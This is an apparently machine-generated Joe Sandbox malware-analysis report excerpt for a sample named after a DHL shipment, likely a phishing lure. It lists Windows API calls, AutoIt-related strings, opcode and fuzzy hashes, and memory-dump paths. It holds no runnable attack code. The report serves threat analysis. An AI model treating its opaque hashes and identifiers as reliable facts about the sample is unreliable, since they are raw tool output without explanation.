• String ID: , $$AUTOITCALLVARIABLE%d
• API String ID: 3506404897-2584243854
• Opcode ID: eb7caa90b5cf7a90a0ace08e762a49a92df6de22c3b295a1086332a85ef5246f
• Instruction ID: bc415e627f010cb01228f5afae4e695a94e0a5d2a6abadae9905cc0f38b551da
• Opcode Fuzzy Hash: eb7caa90b5cf7a90a0ace08e762a49a92df6de22c3b295a1086332a85ef5246f
• Instruction Fuzzy Hash: FE218E31700229EACF14EF64DC96AEE77B9FF44300F400469E559EB282DA38EA45CB61
APIs
• SendMessageW.USER32(00000000,00000143,00000000,?), ref: 00836761
• SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0083676C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: MessageSend
• String ID: Combobox
• API String ID: 3850602802-2096851135
• Opcode ID: ad32f19288fa40ddcb2c50f19ac454f6e8d23f55f52bda3872095e3d870022fb
• Instruction ID: 8db97c2b8d0c70cd37253b03e65468f03c1c045b5133fad46e71c35b8edaaa58
• Opcode Fuzzy Hash: ad32f19288fa40ddcb2c50f19ac454f6e8d23f55f52bda3872095e3d870022fb
• Instruction Fuzzy Hash: 3C119371600208BFEF118F58CC85EAB376AFB843A8F504629F914D7290E6759C6187E0
APIs
  • Part of subcall function 007B1D35: CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,00000096), ref: 007B1D73
  • Part of subcall function 007B1D35: GetStockObject.GDI32(00000011), ref: 007B1D87
  • Part of subcall function 007B1D35: SendMessageW.USER32(00000000,00000030,00000000), ref: 007B1D91
• GetWindowRect.USER32(00000000,?), ref: 00836C71
• GetSysColor.USER32(00000012), ref: 00836C8B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Window$ColorCreateMessageObjectRectSendStock
• String ID: static
• API String ID: 1983116058-2160076837
• Opcode ID: 15cb1ab992524ecebc7c157139f4badf108aa49c5e382441cf78789864e44038
• Instruction ID: 51f4d6d553f853537cc989ef2e6a5c8667d997f85ba2f13c0346cca9c90f2cbc
• Opcode Fuzzy Hash: 15cb1ab992524ecebc7c157139f4badf108aa49c5e382441cf78789864e44038
• Instruction Fuzzy Hash: 0D212C72910209AFDF04DFA8CC45EFA7BA8FB48314F005629FD55D2251E635E861DBA0
APIs
• GetWindowTextLengthW.USER32(00000000), ref: 008369A2
• SendMessageW.USER32(?,000000B1,00000000,00000000), ref: 008369B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: LengthMessageSendTextWindow
• String ID: edit
• API String ID: 2978978980-2167791130
• Opcode ID: fc9e7e92ab9a748ba20bae1161cc822e9885bc2659555b0fabfebfdc1a1724f0
• Instruction ID: 902834ddb857e9102c759e1f8c76af6af03ab4f57599998697e3365329960ef6
• Opcode Fuzzy Hash: fc9e7e92ab9a748ba20bae1161cc822e9885bc2659555b0fabfebfdc1a1724f0
• Instruction Fuzzy Hash: 6B119D71500108BBEF108E78DC44BEB3B69FB85378F608724FAA4D61E0D635DC6097A0
APIs
• _memset.LIBCMT ref: 00812A22
• GetMenuItemInfoW.USER32(00000030,?,00000000,00000030), ref: 00812A41
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: InfoItemMenu_memset
• String ID: 0
• API String ID: 2223754486-4108050209
• Opcode ID: f060b369a59fe45858ecdd0fd2ec8f55b2126200ef8a77c46b43109d0496b450
• Instruction ID: fd68fa4ad7bf8c30441a35fde7d6e7f77e157423d21752f29ca26c251dd3b723
• Opcode Fuzzy Hash: f060b369a59fe45858ecdd0fd2ec8f55b2126200ef8a77c46b43109d0496b450
• Instruction Fuzzy Hash: F711BE32901128ABCB34DB9CD844BEAB7AEFF45314F044021E95AE7290D770ED9AC791
APIs
• InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0082222C
• InternetSetOptionW.WININET(00000000,00000032,?,00000008), ref: 00822255
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: Internet$OpenOption
• String ID: <local>
• API String ID: 942729171-4266983199
• Opcode ID: df218d5866de952cf6f37fce25986f5e192c81e29f6888b8e047715f3ff056ee
• Instruction ID: fc66aaf8f68eea554d63de01b5fe08c0dd0f3d56d2ff4005509de0bbbfb84309
• Opcode Fuzzy Hash: df218d5866de952cf6f37fce25986f5e192c81e29f6888b8e047715f3ff056ee
• Instruction Fuzzy Hash: 7D11E070541235FADB288F11AC85EBBFBA8FF16355F10822AFA14C6040D27169D0D6F0
APIs
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
  • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
• SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00808E73
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 1bfc724f61522e294b4959ba6819d56e371bd1c9e79d184db638175903141352
• Instruction ID: 9b180401617b275c3154c206491fbdb985c766a4374bc00ed783d6a532c13698
• Opcode Fuzzy Hash: 1bfc724f61522e294b4959ba6819d56e371bd1c9e79d184db638175903141352
• Instruction Fuzzy Hash: BD01F571701228EBCF18EBA4CC469FE7368FF41360B440A19F875A72E2EE355808C650
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: __fread_nolock_memmove
• String ID: EA06
• API String ID: 1988441806-3962188686
• Opcode ID: 260ebbe844e395f80465aff489e1d4b96c3b4c88c0fe644eda9151deb7e11617
• Instruction ID: ab88e606d5b138dc37978bbe2bc5e33686cfd16e3cb9b6e7009b69010e875bdf
• Opcode Fuzzy Hash: 260ebbe844e395f80465aff489e1d4b96c3b4c88c0fe644eda9151deb7e11617
• Instruction Fuzzy Hash: 5501F971804218BFDB18CAA8D81AEEE7BFCDF11301F00419FF552D2281E978E6048BA0
APIs
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
  • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
• SendMessageW.USER32(?,00000180,00000000,?), ref: 00808D6B
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: 8dceeb95626b17823bc14749bb0bcd4b16cda67281d8e0a66d454c8827b805a1
• Instruction ID: 8954260663816449aa3001995d9d7ddc05d08e0ae29c1a0c1bf8b2494bfb52bd
• Opcode Fuzzy Hash: 8dceeb95626b17823bc14749bb0bcd4b16cda67281d8e0a66d454c8827b805a1
• Instruction Fuzzy Hash: 4B01D471B41108EBDF18EBA0CD56BFF73A8EF15340F140129B841A32E1EE285E08D2B1
APIs
  • Part of subcall function 007B7DE1: _memmove.LIBCMT ref: 007B7E22
  • Part of subcall function 0080AA99: GetClassNameW.USER32(?,?,000000FF), ref: 0080AABC
• SendMessageW.USER32(?,00000182,?,00000000), ref: 00808DEE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
• Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
Similarity
• API ID: ClassMessageNameSend_memmove
• String ID: ComboBox$ListBox
• API String ID: 372448540-1403004172
• Opcode ID: fb3429971a8b3a82de14119fdfca3a6058147a621a7f6565f65531be6d655e2b
• Instruction ID: 9b29010c8e018cc1b0b146502baa89d3e3acf21bef969ef2c0bacc84e96e149f
• Opcode Fuzzy Hash: fb3429971a8b3a82de14119fdfca3a6058147a621a7f6565f65531be6d655e2b
• Instruction Fuzzy Hash: 08018471B41109E7DB15E7A4CD46BFE77A8EB11350F140115B845A32D2DA295E08D2B1
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: ClassName_wcscmp
                                                                                    • String ID: #32770
                                                                                    • API String ID: 2292705959-463685578
                                                                                    • Opcode ID: 2c73f272fece02ae49850f824530ec59409b2d8c1372f5c29d7ab359a31f0996
                                                                                    • Instruction ID: b6fb611a07450bf457be894029658f4b8904d455e23517f156a2c62e88aa9e6c
                                                                                    • Opcode Fuzzy Hash: 2c73f272fece02ae49850f824530ec59409b2d8c1372f5c29d7ab359a31f0996
                                                                                    • Instruction Fuzzy Hash: 98E0D832A0022C6BE7209BA9AC4DFA7F7ACFB85B70F010167FD04D3151E9609A558BE1
                                                                                    APIs
                                                                                      • Part of subcall function 007EB314: _memset.LIBCMT ref: 007EB321
                                                                                      • Part of subcall function 007D0940: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,007EB2F0,?,?,?,007B100A), ref: 007D0945
                                                                                    • IsDebuggerPresent.KERNEL32(?,?,?,007B100A), ref: 007EB2F4
                                                                                    • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,007B100A), ref: 007EB303
                                                                                    Strings
                                                                                    • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 007EB2FE
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                                                                    • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                                    • API String ID: 3158253471-631824599
                                                                                    • Opcode ID: cf95fb474c6aa7844ed9493119d11310632656ae1c100597d39577886f43c2f4
                                                                                    • Instruction ID: ea48cf6d393aaf70a945bfa17b6345a1e57fcc3ac3fd9ef67908c53fa5a502d6
                                                                                    • Opcode Fuzzy Hash: cf95fb474c6aa7844ed9493119d11310632656ae1c100597d39577886f43c2f4
                                                                                    • Instruction Fuzzy Hash: B4E06D70600741CBD720DF29D5093477AE4FF44315F00892DE896C7752EBB8E448CBA1
                                                                                    APIs
                                                                                    • GetSystemDirectoryW.KERNEL32(?), ref: 007F1775
                                                                                      • Part of subcall function 0082BFF0: LoadLibraryA.KERNEL32(kernel32.dll,?,007F195E,?), ref: 0082BFFE
                                                                                      • Part of subcall function 0082BFF0: GetProcAddress.KERNEL32(00000000,GetSystemWow64DirectoryW), ref: 0082C010
                                                                                    • FreeLibrary.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000104), ref: 007F196D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: Library$AddressDirectoryFreeLoadProcSystem
                                                                                    • String ID: WIN_XPe
                                                                                    • API String ID: 582185067-3257408948
                                                                                    • Opcode ID: 05bf4b4ed1a81480ca1522a09c2e81847b8674e4a27b604089fdf02ee9f7b52e
                                                                                    • Instruction ID: 36ebaf0a260ad82c3869382f78c30a764b670e7dd689d29901ff4218f63357aa
                                                                                    • Opcode Fuzzy Hash: 05bf4b4ed1a81480ca1522a09c2e81847b8674e4a27b604089fdf02ee9f7b52e
                                                                                    • Instruction Fuzzy Hash: 91F0397081000DDFCB15EB95CA88AFCBBF8BB58300FA00095E206A22A1D7788F84CF70
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 008359AE
                                                                                    • PostMessageW.USER32(00000000), ref: 008359B5
                                                                                      • Part of subcall function 00815244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: bd3b94034b10ad8dcf92f8323d4ae15e979b2ac6e5776d05eec36fc6eddf1561
                                                                                    • Instruction ID: ab9bbb9aebb6d7ac9f539d473d47c4f4c4ec62d14bddea5716b42eb85e18927a
                                                                                    • Opcode Fuzzy Hash: bd3b94034b10ad8dcf92f8323d4ae15e979b2ac6e5776d05eec36fc6eddf1561
                                                                                    • Instruction Fuzzy Hash: 9ED0C932780711BAE6A4AB709C0FFD76614FB94B50F010825B35AEA1E1D9E4A800CA94
                                                                                    APIs
                                                                                    • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0083596E
                                                                                    • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00835981
                                                                                      • Part of subcall function 00815244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 008152BC
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2052899180.00000000007B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007B0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2052884606.00000000007B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.000000000083F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052941044.0000000000864000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052975065.000000000086E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2052989673.0000000000877000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7b0000_DHL 40312052024.jbxd
                                                                                    Similarity
                                                                                    • API ID: FindMessagePostSleepWindow
                                                                                    • String ID: Shell_TrayWnd
                                                                                    • API String ID: 529655941-2988720461
                                                                                    • Opcode ID: 5cd6e0311c0587a45c452916729f28d076a3d45376e6520512f4e1b822e55250
                                                                                    • Instruction ID: 4b8351492843f0b82e3cf51291d6d119d7f74ed8a06f341482c1c70b6dc7fcd3
                                                                                    • Opcode Fuzzy Hash: 5cd6e0311c0587a45c452916729f28d076a3d45376e6520512f4e1b822e55250
                                                                                    • Instruction Fuzzy Hash: 70D0C932784711B6E6A4AB709C0FFD76A14FF90B50F010825B35AEA1E1D9E49800CA94